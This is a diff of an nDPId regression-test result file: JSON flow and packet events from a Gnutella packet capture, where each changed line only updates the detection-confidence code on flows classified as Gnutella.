00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72849,"flow_last_seen":72849,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":72849,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.92.178.182","src_port":28681,"dst_port":57302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -477,10 +477,10 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":74329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07XNAAIAG0w0KAAIPUD3d9sRWd3H5FzmMAAAAAIAC+vDLcAAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":74362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74362,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuYAAEAGPaRQPd32CgACD3dxxFYAg9YB+Rc5jWAS\/\/8Y4gAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":74362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74362,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo7XRAAIAG0xgKAAIPUD3d9sRWd3H5FzmNAIPWAlAQ+vA1rgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74329,"flow_last_seen":74362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":74362,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74329,"flow_last_seen":74362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":74362,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":74510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74510,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuwAAEAGWa63s1pwCgACDyZ8xFMAhNABNL0aJWAS\/\/9vrAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":74510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74510,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo4oxAAIAG+hAKAAIPt7NacMRTJnw0vRolAITQAlAQ+vCMeAAA"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74327,"flow_last_seen":74511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":74511,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74327,"flow_last_seen":74511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":74511,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdtAAIAGUVoKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} 
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTlAAIAG3SgKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8RAAIAGrlIKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} 
@@ -499,7 +499,7 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLlAAIAGV04KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":75482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":75482,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAvIAAEAGpZCcOSoCCgACD4LExFUAh74BMu52DGAS\/\/8XLwAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":75482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75482,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZAVAAIAGxIAKAAIPnDkqAsRVgsQy7nYMAIe+AlAQ+vAz+wAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74328,"flow_last_seen":75501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":75501,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74328,"flow_last_seen":75501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":75501,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":75731,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75731,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAvQAAP8GIh\/bRq9nCgACDxDbxFoAAAAAE+XzBlAUAAA88gAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtJAAIAGDgUKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} 
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R05AAIAGN+MKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} 
@@ -520,7 +520,7 @@ 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYhAAIAGqN8KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOdAAIAGV+0KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsZAAIAGE88KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":63001,"flow_last_seen":78517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":78517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":63001,"flow_last_seen":78517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":78517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":79200,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79200,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KchAAIAGHhYKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UW1AAIAGasEKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kRAAIAGdAUKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} 
@@ -677,7 +677,7 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":83805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":83805,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8ZAAIAGrlAKAAIPcfxWosRbJBfMcOElAAAAAIAC+vAJaQAAAgQFtAEDAwgBAQQC"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":84026,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84026,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwcAAEAGoxhx\/FaiCgACDyQXxFsAmFgBzHDhJmAS\/\/\/UxQAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":84026,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84026,"pkt":"UlQAEjUCCAAn5uVZCABFAAAod8dAAIAGrlsKAAIPcfxWosRbJBfMcOEmAJhYAlAQ+vDxkQAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83805,"flow_last_seen":84027,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84027,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83805,"flow_last_seen":84027,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84027,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYlAAIAGqN4KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOhAAIAGV+wKAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} 
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsdAAIAGE84KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} 
@@ -691,10 +691,10 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KpdAAIAGI14KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":84824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84824,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwwAAEAGn4vS0flUCgACD2CvxFwAmkwBaX1M0WAS\/\/+X6wAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":84824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84824,"pkt":"UlQAEjUCCAAn5uVZCABFAAAov8FAAIAGYtkKAAIP0tH5VMRcYK9pfUzRAJpMAlAQ+vC0twAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84825,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84825,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":84862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84862,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAw4AAEAGBkbaZ4sCCgACDwxyxF0Am0YBMJyEhWAS\/\/9aEAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":84863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84863,"pkt":"UlQAEjUCCAAn5uVZCABFAAAosEBAAIAG2RYKAAIP2meLAsRdDHIwnISFAJtGAlAQ+vB23AAA"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":84863,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":84863,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
